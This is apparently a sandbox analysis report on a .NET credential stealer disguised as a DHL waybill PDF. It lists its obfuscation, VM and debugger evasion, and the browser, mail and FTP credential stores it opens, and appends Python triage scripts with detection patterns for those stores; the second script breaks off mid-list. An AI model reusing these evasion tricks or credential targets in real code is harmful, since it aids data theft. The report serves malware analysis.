Source: AWB DHL#40882993049403.pdf.exe, frm_login.cs | .Net Code: InitializeComponent
Source: 0.2.AWB DHL#40882993049403.pdf.exe.64c0000.5.raw.unpack, -Module-.cs | .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.AWB DHL#40882993049403.pdf.exe.64c0000.5.raw.unpack, PingPong.cs | .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
(The two method names above are built entirely from Unicode format characters, escaped by the decompiler as _XXXX: U+200B to U+200F, U+202A to U+202E and U+206A to U+206F are zero-width, bidirectional-control and deprecated formatting code points, so the identifiers display as blank in most tools while remaining valid .NET metadata names. Both methods call System.Reflection.Assembly.Load(byte[]), i.e. they load a further assembly from a byte array in memory.)
Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | .Net Code: kjIFxWek42 System.Reflection.Assembly.Load(byte[])
Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | .Net Code: kjIFxWek42 System.Reflection.Assembly.Load(byte[])
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: link timestamp 0xFFBAF889 [Wed Dec 16 21:50:01 2105 UTC] (a date in the future, so the TimeDateStamp field has been forged or randomised and is not a genuine build time)
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_02D3F110 pushad ; iretd 0_2_02D3F111
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A24C38 push esp; retf 0_2_05A24C39
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A20C01 push 8BBCEB50h; ret 0_2_05A20C07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A46CC4 push esp; iretd 3_2_06A46CFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A40F01 pushfd ; iretd 3_2_06A40F0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A4B691 push es; ret 3_2_06A4B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A47312 push es; ret 3_2_06A47320
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: section name: .text entropy: 7.160837106255626
Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack | High entropy of concatenated method names, per decompiled class:
Ll3PIg3HHj4jqsAJXv.cs: 'B4JNEGhmCi', 'A8DNvXMhFY', 'ToString', 'rn3Nclr2VB', 'cWwNahyDMT', 'VJ3NQN2Paw', 'yJsNlOH3Ki', 'druN70l6ci', 'cQ2NZcIuc1', 'z9xN4yUqMk'
PaFAxtkSXK2Z0KMn6S.cs: 'XbsSL8IFtq', 'QRIScBW6y3', 'XrpSaDCfwB', 'qDOSQBy7M7', 'PUuSlIeGim', 'doSS74lsRJ', 'S6USZl0LGk', 'zFbS45tG1H', 'vAcSt5v0pN', 'xCxSEtjKK1'
dOmZvwYcJ3bJQ1K7e3.cs: 'niW7LxImRF', 'G1D7abyQcv', 'sJB7l1rRVJ', 'p8n7Za3gCg', 'PNu74R2MgT', 'ii2lyZUnUt', 'mYnl5p0bnE', 'vAylbkaVWp', 'tIHl1b5lR3', 'TDrlh2KN3e'
XavOPJ7y9FcfyvCWjV.cs: 'f4GQwK4XU1', 'T1DQVEd9pl', 'rG4Qsvr9ew', 'jsGQgbxsXK', 'DqnQ3FAy7U', 'cZ3Q20S5Ka', 'aJrQNpqhWB', 'wZaQHitoAu', 'nY5QdJehtV', 'YapQTwyD09'
KRSvHCcV7gUZ39QS3e.cs: 'wLUZcSBibi', 'MpfZQiyD2t', 'ABAZ7dMTJ5', 'yas7iDVNME', 'MqX7zF0uks', 'zT4Z9DCgJk', 'A0kZ6hxdJt', 'wGwZql9TiH', 'QZvZSn0rEv', 'i8aZFM1mMH'
Qm7wtfItMS1KZhC0BH.cs: 'yhDd6WSrP8', 'fBsdSOem2a', 'cnndFL6yho', 'tmmdcyKYUj', 'j5cdausMCZ', 'Ie9dlPsFaT', 'AhEd78dBLO', 'nBxHbMjfGA', 'uurH1qjXEl', 'YtgHhUsDLh'
gUYTx7zTaHPcA8E230.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bNNdOQPXxp', 'jgKd3lclWy', 'gCid2OiWCi', 'Uv2dNg9MI3', 'DoGdHCd1Aw', 'XoMddT1GG7', 'PDadT1AxF0'
ohc82Wdo6MQn9twU9X.cs: 'iMiHKU9iq1', 'ID4HnrA3Bh', 'QhsH8tGdeU', 'EnnHJCwk3K', 'XntHmd6DHh', 'zwNHPyZDlg', 'Next', 'Next', 'Next', 'NextBytes'
GRS3NlF8YJ6uTX5DNu.cs: 'ghU6ZmyHYM', 'K2T64nE31G', 's5G6ENebqQ', 'eBY6vANwVI', 'cUg632EHaF', 'QNJ626stL1', 'hnaexYfaNgasKRoQpF', 'OvS78OnIXiUDSkxhOF', 'UJH66xbygl', 'TGu6S04qvI'
Q2hIxEW7puPvXh91u4.cs: 'ToString', 'eF92k818HQ', 'IY32nF52ln', 'JIb28ZGEjc', 'unC2Jfx03x', 'bVX2PIY6wv', 'oLh2W5Q1p6', 'mpM2DdUV1j', 'xiU2BAa0Ha', 'gpg2jONs8h'
bo55ekTyRCk67yIfAQ.cs: 'bvwZoGyJc5', 'TaPZfT6ySY', 'tRqZxbtJ5X', 'tHcZwSOXjR', 'p97ZI6p49D', 'HchZVgqRnT', 'CXWZYYXjHg', 'nMlZs3IuX5', 'JuIZgaJNqx', 'GF9ZpbZFVA'
bnoHRT9hdPt9cQOBU9.cs: 'ppPx84nJf', 'LAjwErKeO', 'pAjVwBl0p', 'y82YZZfFD', 'H46ge5JZJ', 'ueYpTh0tl', 'E0Tq0DBTuxpU8OP1pJ', 'RjZQ67ifY4gYqaTTWD', 'H24HdtPoT', 'GiTTNwHTH'
BEW4rqhvQAwW9nbdY9.cs: 'MgKN1xVanX', 'gOnNiJadQN', 'XCfH9FoS6L', 'AUUH6aXcwK', 'Pi8Nk5Mp4P', 'c5rNUlvnaj', 'horNr8scrp', 'gwJNmyqNTK', 'yVKNRl7TaZ', 'LLANXUS2sb'
EPPBiYLMwfOahZetcr.cs: 'AuFOsrcZWK', 'SROOgrcYFR', 'zvtOKlpbVR', 'oWxOnGjwnf', 'RQQOJRNfhA', 'im8OPQaGI5', 'pOEODc9Hws', 'nvaOBidSpV', 'R76OMOs2lO', 'GvSOkYNr6A'
fwVJJWlEtVmSefL0fCG.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZmTmFjAHV', 'S29TRbpERu', 'cLJTXgSQQT', 'vcCT0HgC27', 'w1YTy1CJjY', 'bs4T5CMDEq', 'u8rTbW4OQB'
qO4Z9xt0en1avIDhdN.cs: 'rnyam0NnwA', 'xHyaRwOhfR', 'UbEaXMHpcY', 'kKga0PSoVi', 'tTdaywFE6x', 'BLfa5y4NDD', 'X7Sab1DhKc', 'ca1a1IKK41', 'V1hahwlVZh', 'U6YaiGpi4O'
MaVoDSlp9MC9bZAmJYs.cs: 'gFtdooMBgc', 'JBEdf7ZGCg', 'jIxdxBEPmS', 'PrMdwwypi1', 'lAPdIGCwsK', 'hW3dVQ4DwL', 'WYwdYxjeJ5', 'bMedsduLC6', 'e7hdgQwweJ', 'Xqrdp13K7G'
JL7gbFo71R8eaKTWhv.cs: 'Dispose', 'wKk6hjhgTA', 'imVqntJCtD', 'hqCuuIGGrl', 'zIH6iloXwl', 'L316zFoult', 'ProcessDialogKey', 'VZHq95cjvk', 'DY4q6rQsu9', 'Scnqq2MQkr'
WWrdoQvMO4I0paKyTU.cs: 'cal3M4pgJe', 'V2j3UTjaCu', 'uUU3mTU3Hp', 'd8Q3RiQHSU', 'pEM3n7mcDO', 'wp838hoFaY', 'K1B3JIfqkk', 'b1M3PiLdJ5', 'ii33Wo9JdI', 'cFj3D45Ps8'
Mia6hjeLSVY2LFjtdt.cs: 'IAKHc0XmK5', 'zC8HaSlvhN', 'TL9HQ6AQIO', 'jGAHlcecme', 'vIMH79qvmb', 'SwcHZ9p4Vk', 'VDUH4eQYQH', 'EOYHtYr4sB', 'vIjHEBhYWV', 'fDZHvds176'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack | High entropy of concatenated method names: the same twenty classes with identical method-name lists as in the 4143c48.2 dump above (the report lists each class a second time for this dump).
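The "High entropy of concatenated method names" verdicts above and the 2105 link timestamp are both checks that can be reproduced offline. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample: OBFUSCATED is the method list of class Ll3PIg3HHj4jqsAJXv copied from the listing above, BENIGN is a constructed comparison list of ordinary .NET method names, and the 5.0-bit flagging threshold is an assumption tuned to these two inputs rather than the sandbox's own cutoff.

```python
import math
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed inputs. OBFUSCATED is the method-name list of class
# Ll3PIg3HHj4jqsAJXv from the decompiled dump listed in the report;
# BENIGN is a comparison list of ordinary .NET method names.
OBFUSCATED = ['B4JNEGhmCi', 'A8DNvXMhFY', 'ToString', 'rn3Nclr2VB',
              'cWwNahyDMT', 'VJ3NQN2Paw', 'yJsNlOH3Ki', 'druN70l6ci',
              'cQ2NZcIuc1', 'z9xN4yUqMk']
BENIGN = ['InitializeComponent', 'Dispose', 'ToString', 'CanConvertFrom',
          'ConvertFrom', 'ConvertTo', 'ProcessDialogKey', 'Next',
          'NextBytes', 'GetHashCode']

ENTROPY_THRESHOLD = 5.0   # assumption: bits/char above which a class is flagged
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def shannon_entropy(text: str) -> float:
    """Bits per character of `text` (0.0 for the empty string)."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def name_entropy(names) -> float:
    """Entropy of the concatenated method names, the statistic behind the
    report's 'High entropy of concatenated method names' signature."""
    return shannon_entropy(''.join(names))


def looks_renamed(name: str) -> bool:
    """Per-name heuristic: renaming obfuscators emit fixed-length names that
    mix upper case, lower case and digits with no word boundaries."""
    has_upper = any(c.isupper() for c in name)
    has_lower = any(c.islower() for c in name)
    has_digit = any(c.isdigit() for c in name)
    return has_upper and has_lower and has_digit


def classify(names) -> dict:
    """Summarise one class: entropy, share of renamed-looking methods and
    the verdict used for triage. Both signals are reported because a class
    with very few methods can score high on entropy alone."""
    renamed = sum(looks_renamed(n) for n in names)
    ent = name_entropy(names)
    return {
        'entropy': round(ent, 2),
        'renamed_ratio': renamed / len(names) if names else 0.0,
        'obfuscated': ent > ENTROPY_THRESHOLD,
    }


def link_time(timestamp: int) -> datetime:
    """Decode IMAGE_FILE_HEADER.TimeDateStamp (seconds since the Unix epoch)
    without depending on the platform's time_t range."""
    return EPOCH + timedelta(seconds=timestamp)


def plausible_link_time(timestamp: int, now=None) -> bool:
    """A real linker writes the current time. Assumed bounds: anything
    before 2000 or after 'now' is treated as forged or randomised."""
    now = now or datetime.now(timezone.utc)
    t = link_time(timestamp)
    return datetime(2000, 1, 1, tzinfo=timezone.utc) <= t <= now


if __name__ == '__main__':
    print('obfuscated class:', classify(OBFUSCATED))
    print('benign class:    ', classify(BENIGN))
    ts = 0xFFBAF889                      # value from the report's static PE line
    print('link time:', link_time(ts).isoformat(),
          'plausible:', plausible_link_time(ts))
```

Run as a script it prints both verdicts. The obfuscated class comes out at roughly 5.4 bits per character against roughly 4.4 for the benign list, and the 0xFFBAF889 stamp decodes to 2105-12-16 21:50:01 UTC, matching the report. In practice the method lists would come from a metadata reader such as dnlib or from the decompiler's export rather than being typed in.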

                      Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.exe | Static PE information: AWB DHL#40882993049403.pdf.exe
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Process information set: NOOPENFILEERRORBOX (43 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (57 occurrences)
(NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX): it suppresses the dialog Windows would otherwise show when a file or DLL cannot be found, so a failed open stays silent for the user. Legitimate loaders, the .NET runtime probing for assemblies among them, set the same flag, so the raw count is weak evidence on its own and is only meaningful together with the behaviour in the surrounding sections.)

                      Malware Analysis System Evasion

Source: Yara match, file source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 (Host: ip-api.com, Connection: Keep-Alive)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp; binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Memory allocated (memory reserve | memory write watch) at: 2C90000, 2F00000, 2C90000, 8340000, 7C80000, 9340000, A340000, A6D0000, B6D0000, 85E0000, A6D0000, B6D0000
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Thread delayed: delay time: 922337203685477 (2 observations)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Thread delayed: delay times, in the order observed: 1799938, 1799813, 1799688, 1799563, 1799438, 1799328, 1799219, 1799094, 1798985, 1798860, 1798735, 1798610, 1798485, 1798360, 1798235, 1798110, 1797985, 1797860, 1797735, 1797610, 1797485, 1797360, 1797235, 1797110
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Window / User API: threadDelayed 1444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Window / User API: threadDelayed 7608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Window / User API: threadDelayed 2227
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe TID: 3660, Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe TID: 5808, Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe TID: 4708, Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Thread delayed: delay times, in the order observed: 922337203685477, 30000, 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Thread delayed: delay times, in the order observed: 100000, 99875, 99766, 99656, 99547, 99437, 99328, 99219, 99094, 98985, 98860, 98735, 98610, 98485, 98360, 98235, 98034, 97922, 97811, 97690, 97578, 97469, 97360, 97235, 97110, 96985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Thread delayed: delay times, in the order observed: 1799938, 1799813, 1799688, 1799563, 1799438, 1799328, 1799219, 1799094, 1798985, 1798860, 1798735, 1798610, 1798485, 1798360, 1798235, 1798110, 1797985, 1797860, 1797735, 1797610, 1797485, 1797360, 1797235, 1797110
Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, binary or memory string: VMware
Source: RegSvcs.exe, 00000003.00000002.4520028530.0000000006552000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, binary or memory string: vmware
Source: RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, binary or memory string: VMwareVBox

                      Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_02F370B8 CheckRemoteDebuggerPresent (3_2_02F370B8)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Process queried: DebugPort
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Queries volume information of: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll; C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll; C:\Windows\Fonts\micross.ttf; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information of: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll; C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match, file source: dump.pcap, type: PCAP
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 5660, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 observations)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 5660, type: MEMORYSTR
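The evasion, anti-debugging and credential-access entries above are what an analyst has to turn into a verdict by hand. The script below is an added triage example (it is not Joe Sandbox code and not part of this report): it classifies behaviour lines of the kind listed in the Malware Analysis System Evasion, Anti Debugging and Stealing of Sensitive Information sections into indicator categories, and it treats the two sleep patterns seen here specially: a delay of 922337203685477 ms, which is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10000), and runs of steadily decreasing delays such as the 1799938, 1799813, 1799688, ... series. The sample lines are a constructed subset of this report's entries with the spaces the extraction dropped restored; the category names, the credential-store labels and the countdown thresholds (min_len, max_step) are the example's own choices, not Joe Sandbox's.

```python
import re
from collections import defaultdict

# 922337203685477 ms is Int64.MaxValue ticks / 10000, i.e. TimeSpan.MaxValue in
# milliseconds: a sleep that only ends if the sandbox skips or shortens it.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

# WMI classes the sample enumerates; all expose vendor strings (VMware, VBox,
# Hyper-V) that VM-fingerprinting code looks for.
VM_WMI_CLASSES = ("Win32_VideoController", "Win32_NetworkAdapterConfiguration",
                  "Win32_BaseBoard", "Win32_Processor")
SANDBOX_STRINGS = ("sbiedll.dll", "vmware", "vbox", "hyper-v")
DEBUG_CHECKS = ("CheckRemoteDebuggerPresent", "DebugPort")

# Credential stores opened in the report, labelled with what each holds.  The
# labels are this example's wording (assumption), not categories from the report.
CREDENTIAL_STORES = (
    (re.compile(r"\\(Chrome|Edge)\\User Data\\.*\\Login Data$", re.I), "Chromium saved logins"),
    (re.compile(r"\\(Firefox|Thunderbird|Cyberfox|BlackHawk)\\profiles\.ini$", re.I), "Gecko profile index"),
    (re.compile(r"\\WinSCP 2\\Sessions$", re.I), "WinSCP stored sessions"),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles$", re.I), "MAPI (Outlook) profiles"),
    (re.compile(r"\\Ftplist\.txt$", re.I), "FTP Navigator site list"),
    (re.compile(r"\\IncrediMail\\Identities$", re.I), "IncrediMail identities"),
)

WMI_RE = re.compile(r"WMI Queries:.*?(Win32_\w+)")
HTTP_RE = re.compile(r"GET (\S+) HTTP/1\.\d\s+Host:\s*([\w.-]+)")
STRING_RE = re.compile(r"Binary or memory string: (.+)$")
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
OPEN_RE = re.compile(r"(?:File|Key) opened: (.+)$")


def classify_line(line):
    """Map one behaviour line to (category, detail); None for lines of no interest."""
    line = line.strip()
    m = WMI_RE.search(line)
    if m and m.group(1) in VM_WMI_CLASSES:
        return ("vm_fingerprint_wmi", m.group(1))
    m = HTTP_RE.search(line)
    if m and m.group(2).lower() == "ip-api.com" and "hosting" in m.group(1):
        # ip-api's "hosting" field says whether the caller's public IP sits in a
        # data-centre range, which is how the sample decides it is being analysed.
        return ("hosting_check", m.group(2) + m.group(1))
    m = STRING_RE.search(line)
    if m and any(s in m.group(1).lower() for s in SANDBOX_STRINGS):
        return ("sandbox_string", m.group(1))
    for check in DEBUG_CHECKS:
        if check in line:
            return ("debugger_check", check)
    m = DELAY_RE.search(line)
    if m:
        ms = int(m.group(1))
        return ("infinite_sleep" if ms >= TIMESPAN_MAX_MS else "sleep", ms)
    m = OPEN_RE.search(line)
    if m:
        for pattern, label in CREDENTIAL_STORES:
            if pattern.search(m.group(1)):
                return ("credential_store", label)
    return None


def countdown_runs(delays, min_len=5, max_step=500):
    """Find runs of strictly decreasing delays with small steps.  In this report the
    values fall from 1799938 ms in steps of about 110 to 125 ms, consistent with a
    loop that re-sleeps for the remainder of a fixed window instead of sleeping
    once.  Returns one (first, last, count) tuple per run."""
    runs, current = [], delays[:1]
    for prev, cur in zip(delays, delays[1:]):
        if 0 < prev - cur <= max_step:
            current.append(cur)
        else:
            if len(current) >= min_len:
                runs.append((current[0], current[-1], len(current)))
            current = [cur]
    if len(current) >= min_len:
        runs.append((current[0], current[-1], len(current)))
    return runs


def triage(lines):
    """Group classified lines by category and add the countdown analysis of sleeps."""
    findings = defaultdict(list)
    for line in lines:
        hit = classify_line(line)
        if hit:
            findings[hit[0]].append(hit[1])
    findings["sleep_countdown"] = countdown_runs(findings.get("sleep", []))
    return dict(findings)


# Constructed sample: a subset of this report's behaviour lines, spaces restored.
SAMPLE_LINES = [
    r"RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    r"RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive",
    r"RegSvcs.exe Binary or memory string: SBIEDLL.DLL",
    r"RegSvcs.exe Binary or memory string: VMwareVBox",
    r"RegSvcs.exe Code function: 3_2_02F370B8 CheckRemoteDebuggerPresent",
    r"RegSvcs.exe Process queried: DebugPort",
    r"AWB DHL#40882993049403.pdf.exe Thread delayed: delay time: 922337203685477",
    r"RegSvcs.exe Thread delayed: delay time: 1799938",
    r"RegSvcs.exe Thread delayed: delay time: 1799813",
    r"RegSvcs.exe Thread delayed: delay time: 1799688",
    r"RegSvcs.exe Thread delayed: delay time: 1799563",
    r"RegSvcs.exe Thread delayed: delay time: 1799438",
    r"RegSvcs.exe Thread delayed: delay time: 1799328",
    r"RegSvcs.exe Thread delayed: delay time: 30000",
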